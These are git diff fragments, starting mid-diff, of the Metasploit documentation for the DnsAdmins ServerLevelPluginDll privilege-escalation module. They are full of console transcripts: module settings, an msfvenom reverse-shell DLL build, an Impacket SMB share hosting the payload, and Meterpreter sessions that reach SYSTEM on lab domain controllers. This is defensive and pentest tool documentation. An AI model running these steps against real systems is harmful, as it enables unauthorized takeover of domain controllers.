+ ~/Desktop/impacket-0.9.21/examples  sudo python3 smbserver.py -smb2support -ip 172.17.168.195 test /home/gwillcox/.msf4/local/
+Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
 
 [*] Config file parsed
 [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
@@ -155,132 +198,151 @@ Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
 [*] Config file parsed
 [*] Config file parsed
 [*] Config file parsed
+
 ```
 
-You can generate a DLL using the module by setting `MAKEDLL` to `true`:
+This will create a SMBv2 server, listening on IP address 172.17.168.195, with a share named `test`, that will be sharing the contents of
+the directory at `/home/gwillcox/.msf4/local/`. Next, set `MAKEDLL` to `true` and run the module to generate the payload.
+
 ```
-msf5 > sessions
-
-Active sessions
-===============
-
-  Id  Name  Type                     Information                            Connection
-  --  ----  ----                     -----------                            ----------
-  1         meterpreter x64/windows  BASILISKCORP\salazar.slytherin @ DC01  192.168.137.139:4444 -> 192.168.137.133:56307 (192.168.137.133)
-
-msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll 
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
-PAYLOAD => windows/x64/meterpreter/reverse_tcp
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
-LHOST => 192.168.137.139
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
-LPORT => 4444
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
-DLLNAME => test.dll
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
+msf6 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+[*] Using configured payload windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 3 
+SESSION => 3
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/bind_tcp
+PAYLOAD => windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 6688
+LPORT => 6688
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME mp4.dll
+DLLNAME => mp4.dll
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
 MAKEDLL => true
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
-SESSION => 1
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > show options
 
-[*] Started reverse TCP handler on 192.168.137.139:4444 
+Module options (exploit/windows/local/dnsadmin_serverlevelplugindll):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   AVTIMEOUT  60               yes       Time to wait for AV to potentially notice the DLL file we dropped, in seconds.
+   DLLNAME    mp4.dll          yes       DLL name (default: msf.dll)
+   DLLPATH    %TEMP%           yes       Path to DLL. Can be a UNC path. (default: %TEMP%)
+   MAKEDLL    true             yes       Just create the DLL, do not exploit.
+   SESSION    3                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/bind_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     6688             yes       The listen port
+   RHOST     172.17.169.123   no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
 [*] Building DLL...
-[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
+[+] mp4.dll stored at /home/gwillcox/.msf4/local/mp4.dll
+[*] Started bind TCP handler against 172.17.169.123:6688
 [*] Exploit completed, but no session was created.
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > 
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > 
 ```
 
-Once the DLL has been generated, copy it to the folder shared by Impacket's `smbserver`:
+Once the DLL has been generated, one can proceed with the actual exploit:
 ```
-msfdev2@automata-ng:~$ cp /home/msfdev2/.msf4/local/test.dll ~/test/test.dll 
-msfdev2@automata-ng:~$ 
-```
-
-Alternatively, you can generate a DLL using `msfvenom`:
-```
-msfdev2@automata-ng:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.137.139 LPORT=4444 -f dll -o ~/test/test.dll
-[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
-[-] No arch selected, selecting arch: x64 from the payload
-No encoder or badchars specified, outputting raw payload
-Payload size: 510 bytes
-Final size of dll file: 5120 bytes
-Saved as: /home/msfdev2/test/test.dll
-msfdev2@automata-ng:~$ 
-```
-
-After that, proceed with the actual exploit:
-```
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL false
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL false
 MAKEDLL => false
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.139\\test
-DLLPATH => \\192.168.137.139\test
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
-DLLNAME => test.dll
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
-VERBOSE => true
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\172.17.168.195\\test
+DLLPATH => \\172.17.168.195\test
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME mp4.dll
+DLLNAME => mp4.dll
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
 
-[*] Started reverse TCP handler on 192.168.137.139:4444 
-[+] OS seems vulnerable.
-[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
-[+] DNS service found on DC01.
-[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
-[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
 [*] Checking service state...
 [*] Using user-provided UNC path.
-[*] Modifying ServerLevelPluginDll to point to \\192.168.137.139\test\test.dll...
+[!] Entering danger section...
+[*] Modifying ServerLevelPluginDll to point to \\172.17.168.195\test\mp4.dll...
 [+] Registry property serverlevelplugindll successfully reset.
 [*] Restarting the DNS service...
-[*] Sending stage (206403 bytes) to 192.168.137.133
-[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56493) at 2020-05-16 03:45:09 +0800
+[*] Started bind TCP handler against 172.17.169.123:6688
+[*] Sending stage (200262 bytes) to 172.17.169.123
+[*] Meterpreter session 4 opened (0.0.0.0:0 -> 172.17.169.123:6688) at 2020-09-09 15:06:33 -0500
 
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
 meterpreter > sysinfo
-Computer        : DC01
+Computer        : WIN-M5JU6L5RA9L
 OS              : Windows 2016+ (10.0 Build 17763).
 Architecture    : x64
 System Language : en_US
-Domain          : BASILISKCORP
-Logged On Users : 18
+Domain          : RAPID7
+Logged On Users : 12
 Meterpreter     : x64/windows
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
 meterpreter > 
 ```
 
 ### Windows Server 2019 Standard x64, just creating DLL
 ```
-msf5 > sessions
-
-Active sessions
-===============
-
-  Id  Name  Type                     Information                            Connection
-  --  ----  ----                     -----------                            ----------
-  1         meterpreter x64/windows  BASILISKCORP\salazar.slytherin @ DC01  192.168.137.139:4444 -> 192.168.137.133:56478 (192.168.137.133)
-
-msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll 
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
-PAYLOAD => windows/x64/meterpreter/reverse_tcp
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
-LHOST => 192.168.137.139
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
-LPORT => 4444
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
-SESSION => 1
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
+msf6 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+[*] Using configured payload windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 3 
+SESSION => 3
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/bind_tcp
+PAYLOAD => windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 6688
+LPORT => 6688
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME mp4.dll
+DLLNAME => mp4.dll
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
 MAKEDLL => true
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
-DLLNAME => test.dll
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > show options
 
-[*] Started reverse TCP handler on 192.168.137.139:4444 
+Module options (exploit/windows/local/dnsadmin_serverlevelplugindll):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   AVTIMEOUT  60               yes       Time to wait for AV to potentially notice the DLL file we dropped, in seconds.
+   DLLNAME    mp4.dll          yes       DLL name (default: msf.dll)
+   DLLPATH    %TEMP%           yes       Path to DLL. Can be a UNC path. (default: %TEMP%)
+   MAKEDLL    true             yes       Just create the DLL, do not exploit.
+   SESSION    3                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/bind_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     6688             yes       The listen port
+   RHOST     172.17.169.123   no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
 [*] Building DLL...
-[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
+[+] mp4.dll stored at /home/gwillcox/.msf4/local/mp4.dll
+[*] Started bind TCP handler against 172.17.169.123:6688
 [*] Exploit completed, but no session was created.
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > 
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) >
 ```
 
 ## Notes
-1. This module is not particularly opsec-safe as it drops a DLL to disk, writes to the registry, and is sure to generate a ton of event logs when the DNS service is stopped and restarted.
-2. The service will crash if the DLL used does not contain the right exports, so using the `msfvenom` generated DLL will definitely cause it to crash.
-3. Automatic cleanup of the dropped DLL is attempted if the DLL has been written to disk, but if automatic cleanup fails manual cleanup may be necessary.
+1. This module is not particularly opsec-safe as it drops a DLL to disk, writes to
+the registry, and is sure to generate a ton of event logs when the DNS service is
+stopped and restarted..
+2. Automatic cleanup of the dropped DLL is attempted if the DLL has been written to
+disk, but if automatic cleanup fails manual cleanup may be necessary.

--- a/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
+++ b/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
@@ -1,8 +1,24 @@
 ## Introduction
 This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
-`ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\`
-named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL
-and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended when using a UNC path.
+`ServerLevelPluginDll` value using dnscmd.exe to create a registry key at
+`HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\` named `ServerLevelPluginDll` that can be 
+made to point to an arbitrary DLL. Restarting the DNS service will then result in the attacker's DLL 
+being loaded and executed as the SYSTEM user, thereby granting the attacker SYSTEM privileges.
+
+Note that there is a slight possibilty that antivirus may pick up on the DLL file which is dropped on 
+the system for this exploit to work. In this case it will not be possible to restart the DNS service 
+via the Service Manager. To resolve this, users must first delete the `ServerLevelPluginDll` value 
+under the `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` key using an administrator 
+account, after which they will then be able to restart the DNS service once again.
+
+To avoid the potential of this occuring, this module has a configurable option, `AVTIMEOUT`, 
+which allows users to configure how long they would like to wait for any potential AV to pick 
+up on the file after which the module will then check to ensure the dropped DLL file exists 
+prior to creating the `ServerLevelPluginDll` value within the
+`HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` key.
+
+Users wishing to use this module with UNC paths to load the DLL from a SMB share onto the target
+are recommended to increase the value of WfsDelay to prevent potential timeouts.
 
 ## Vulnerable Application
 
@@ -17,7 +33,7 @@ Windows Server 2003 and above
 5. `set LPORT <lport>`
 6. `set SESSION <session_no>` to specify session
 7. `set DLLNAME <dllname>` if you want to name your DLL something other than `msf.dll`
-8. `set DLLPATH <dllpath>` if you want to place your DLL somewhere other than `%TEMP%` or want to use a UNC path
+8. `set DLLPATH <dllpath>` if you want to place your DLL somewhere other than `%TEMP%` or if you want to use a UNC path
 9. `set MAKEDLL true` if you want to just make the DLL, and not carry out the exploit
 10. `exploit` to get SYSTEM shell if `MAKEDLL` is set to `false`, or to write the DLL to the `~/.msf4/local` folder if `MAKEDLL` is set to `true` 
 
@@ -27,13 +43,20 @@ Windows Server 2003 and above
 Name of the DLL to use.
 
 ### DLLPATH
-Location of the DLL to use. If a UNC path is provided, the module assumes that the operator already has the prerequisites:
-1. A working SMB2 share (use Impacket's `smbserver.py` to quickly set up one)
-2. A DLL of the same architecture as the target system
+Location of the DLL to use. If a UNC path is provided, the module will assume that the operator
+has already performed the following actions:
+1. Set up a working SMB2 share (via a tool such as Impacket's `smbserver.py`)
+2. Created a DLL of the same architecture as the target system and placed in within this share.
 
 ### MAKEDLL
-Just create the DLL, do not exploit.
-Will create a DLL in the `~/.msf4/local` directory if set to `true`
+If set to `true`, then just create the DLL, do not conduct the full exploit. 
+The resulting DLL will be stored in the `~/.msf4/local` directory.
+
+### AVTIMEOUT
+Time, in seconds, to wait for any AV on the target system to potentially pick up on the 
+dropped DLL file, prior to the module checking to see if the DLL file still exists. This
+is needed to prevent a scenario where the DLL file gets removed and the module tries to make
+changes that could prevent the DNS server from being able to start.
 
 ## Scenarios
 
@@ -77,10 +100,7 @@ msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
 [*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56319) at 2020-05-16 01:41:53 +0800
 
 meterpreter > 
-[*] Erasing ServerLevelPluginDll registry value...
-[*] Removing C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
-
-meterpreter > sysinfo
+[*] Erasing ServerLevelPluginDll registry value...restarting.
 Computer        : DC01
 OS              : Windows 2016+ (10.0 Build 17763).
 Architecture    : x64

--- a/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
+++ b/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
@@ -2,8 +2,7 @@
 This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
 `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\`
 named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL
-and cause it to execute, providing us with SYSTEM privileges. Using the Metasploit-generated DLL will cause the service to become
-unresponsive, and will require removing the registry key and rebooting to get it working again.
+and cause it to execute, providing us with SYSTEM privileges.
 
 ## Vulnerable Application
 
@@ -35,51 +34,36 @@ Windows Server 2003 and above
 
 ### Windows Server 2019 Standard x64, writing `msf.dll` to `%TEMP%`
 ```
-PAYLOAD => windows/x64/meterpreter/reverse_tcp
-LHOST => 192.168.137.128
-LPORT => 4444
-[*] Exploit running as background job 0.
-[*] Exploit completed, but no session was created.
-
-[*] Started reverse TCP handler on 192.168.137.128:4444 
-msf5 exploit(multi/handler) >
-[*] Sending stage (206403 bytes) to 192.168.137.133
-[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.133:58249) at 2020-02-25 01:40:24 +0800
-
-msf5 exploit(multi/handler) > sessions
+msf5 > sessions
 
 Active sessions
 ===============
 
   Id  Name  Type                     Information                  Connection
   --  ----  ----                     -----------                  ----------
-  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.128:4444 -> 192.168.137.133:58249 (192.168.137.133)
+  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.139:4444 -> 192.168.137.133:56703 (192.168.137.133)
 
-msf5 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
-SESSION => 1
+msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll 
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
 PAYLOAD => windows/x64/meterpreter/reverse_tcp
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.128
-LHOST => 192.168.137.128
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
+LHOST => 192.168.137.139
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
 LPORT => 4444
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
+SESSION => 1
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
 
-[*] Started reverse TCP handler on 192.168.137.128:4444 
-[*] Running check against DC01 as user BASILISKCORP\salazar...
-[+] DNS service found on DC01.
-[+] User BASILISKCORP\salazar is part of the DnsAdmins group.
-[+] User BASILISKCORP\salazar can start/stop the DNS service.
+[*] Started reverse TCP handler on 192.168.137.139:4444 
 [*] Checking service state...
 [*] DNS service is running, proceeding...
-[*] Creating the payload DLL (x64)...
+[*] Building DLL...
 [*] Writing DLL to C:\Users\salazar\AppData\Local\Temp\msf.dll...
 [*] Modifying ServerLevelPluginDll to point to C:\Users\salazar\AppData\Local\Temp\msf.dll...
 [+] Registry property serverlevelplugindll successfully reset.
 [*] Restarting the DNS service...
 [*] Sending stage (206403 bytes) to 192.168.137.133
-[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.133:58255) at 2020-02-25 01:40:49 +0800
+[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:59422) at 2020-05-01 03:28:29 +0800
 
 meterpreter > sysinfo
 Computer        : DC01
@@ -96,55 +80,43 @@ meterpreter >
 
 ### Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll
 The fastest way to get a share up and running is to use Impacket's `smbserver`:
-`sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.128 test ./`
+`sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.139 test ./`
+Generate a DLL using `msfvenom`:
+`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.137.139 LPORT=4444 -f dll -o test.dll`
 ```
-PAYLOAD => windows/x64/meterpreter/reverse_tcp
-LHOST => 192.168.137.128
-LPORT => 4444
-[*] Exploit running as background job 0.
-[*] Exploit completed, but no session was created.
-
-[*] Started reverse TCP handler on 192.168.137.128:4444 
-msf5 exploit(multi/handler) >
-[*] Sending stage (206403 bytes) to 192.168.137.133
-[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.133:52968) at 2020-02-25 01:43:48 +0800
-msf5 exploit(multi/handler) > sessions
+msf5 > sessions
 
 Active sessions
 ===============
 
   Id  Name  Type                     Information                  Connection
   --  ----  ----                     -----------                  ----------
-  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.128:4444 -> 192.168.137.133:52968 (192.168.137.133)
+  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.139:4444 -> 192.168.137.133:62355 (192.168.137.133)
 
-msf5 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
-SESSION => 1
+msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll 
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
 PAYLOAD => windows/x64/meterpreter/reverse_tcp
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.128
-LHOST => 192.168.137.128
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
+LHOST => 192.168.137.139
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
 LPORT => 4444
-msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.128\\test
-DLLPATH => \\192.168.137.128\test
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.139\\test
+DLLPATH => \\192.168.137.139\test
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
 DLLNAME => test.dll
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
+SESSION => 1
 msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
 
-[*] Started reverse TCP handler on 192.168.137.128:4444 
-[*] Running check against DC01 as user BASILISKCORP\salazar...
-[+] DNS service found on DC01.
-[+] User BASILISKCORP\salazar is part of the DnsAdmins group.
-[+] User BASILISKCORP\salazar can start/stop the DNS service.
+[*] Started reverse TCP handler on 192.168.137.139:4444 
 [*] Checking service state...
 [*] DNS service is running, proceeding...
 [*] Using user-provided UNC path.
-[*] Modifying ServerLevelPluginDll to point to \\192.168.137.128\test\test.dll...
+[*] Modifying ServerLevelPluginDll to point to \\192.168.137.139\test\test.dll...
 [+] Registry property serverlevelplugindll successfully reset.
 [*] Restarting the DNS service...
 [*] Sending stage (206403 bytes) to 192.168.137.133
-[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.133:52986) at 2020-02-25 01:46:06 +0800
+[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:62373) at 2020-05-01 02:35:06 +0800
 
 meterpreter > sysinfo
 Computer        : DC01
@@ -152,9 +124,14 @@ OS              : Windows 2016+ (10.0 Build 17763).
 Architecture    : x64
 System Language : en_US
 Domain          : BASILISKCORP
-Logged On Users : 12
+Logged On Users : 11
 Meterpreter     : x64/windows
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > 
 ```
+
+### Notes
+1. This module is not particularly opsec-safe as it drops a DLL to disk, writes to the registry, and is sure to generate a
+a ton of event logs when the DNS service is stopped and restarted.
+2. After exploitation, the DLL cannot be deleted without first stopping the DNS service.

--- a/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
+++ b/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md
@@ -1,0 +1,160 @@
+## Introduction
+This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
+`ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\`
+named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL
+and cause it to execute, providing us with SYSTEM privileges. Using the Metasploit-generated DLL will cause the service to become
+unresponsive, and will require removing the registry key and rebooting to get it working again.
+
+## Vulnerable Application
+
+Windows Server 2003 and above
+
+## Verification Steps
+
+1. Get a Meterpreter shell
+2. `use exploit/windows/local/dnsadmin_serverlevelplugindll`
+3. `set PAYLOAD <payload>`
+4. `set LHOST <lhost>`
+5. `set LPORT <lport>`
+6. `set SESSION <session_no>`
+7. `set DLLNAME <dllname>` if you want to name your DLL something other than `msf.dll`
+8. `set DLLPATH <dllpath>` if you want to place your DLL somewhere other than `%TEMP%` or want to use a UNC path
+9. `exploit` to get SYSTEM shell
+
+## Options
+
+  **DLLNAME**
+  Name of the DLL to use.
+
+  **DLLPATH**
+  Location of the DLL to use. If a UNC path is provided, the module assumes that the operator already has the prerequisites:
+  1. A working SMB2 share (use Impacket's `smbserver.py` to quickly set up one)
+  2. A DLL of the same architecture as the target system
+
+## Scenarios
+
+### Windows Server 2019 Standard x64, writing `msf.dll` to `%TEMP%`
+```
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+LHOST => 192.168.137.128
+LPORT => 4444
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.137.128:4444 
+msf5 exploit(multi/handler) >
+[*] Sending stage (206403 bytes) to 192.168.137.133
+[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.133:58249) at 2020-02-25 01:40:24 +0800
+
+msf5 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                  Connection
+  --  ----  ----                     -----------                  ----------
+  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.128:4444 -> 192.168.137.133:58249 (192.168.137.133)
+
+msf5 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
+SESSION => 1
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.128
+LHOST => 192.168.137.128
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
+LPORT => 4444
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Running check against DC01 as user BASILISKCORP\salazar...
+[+] DNS service found on DC01.
+[+] User BASILISKCORP\salazar is part of the DnsAdmins group.
+[+] User BASILISKCORP\salazar can start/stop the DNS service.
+[*] Checking service state...
+[*] DNS service is running, proceeding...
+[*] Creating the payload DLL (x64)...
+[*] Writing DLL to C:\Users\salazar\AppData\Local\Temp\msf.dll...
+[*] Modifying ServerLevelPluginDll to point to C:\Users\salazar\AppData\Local\Temp\msf.dll...
+[+] Registry property serverlevelplugindll successfully reset.
+[*] Restarting the DNS service...
+[*] Sending stage (206403 bytes) to 192.168.137.133
+[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.133:58255) at 2020-02-25 01:40:49 +0800
+
+meterpreter > sysinfo
+Computer        : DC01
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : BASILISKCORP
+Logged On Users : 11
+gMeterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+```
+
+### Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll
+The fastest way to get a share up and running is to use Impacket's `smbserver`:
+`sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.128 test ./`
+```
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+LHOST => 192.168.137.128
+LPORT => 4444
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.137.128:4444 
+msf5 exploit(multi/handler) >
+[*] Sending stage (206403 bytes) to 192.168.137.133
+[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.133:52968) at 2020-02-25 01:43:48 +0800
+msf5 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                  Connection
+  --  ----  ----                     -----------                  ----------
+  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.128:4444 -> 192.168.137.133:52968 (192.168.137.133)
+
+msf5 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
+SESSION => 1
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.128
+LHOST => 192.168.137.128
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
+LPORT => 4444
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.128\\test
+DLLPATH => \\192.168.137.128\test
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
+DLLNAME => test.dll
+msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Running check against DC01 as user BASILISKCORP\salazar...
+[+] DNS service found on DC01.
+[+] User BASILISKCORP\salazar is part of the DnsAdmins group.
+[+] User BASILISKCORP\salazar can start/stop the DNS service.
+[*] Checking service state...
+[*] DNS service is running, proceeding...
+[*] Using user-provided UNC path.
+[*] Modifying ServerLevelPluginDll to point to \\192.168.137.128\test\test.dll...
+[+] Registry property serverlevelplugindll successfully reset.
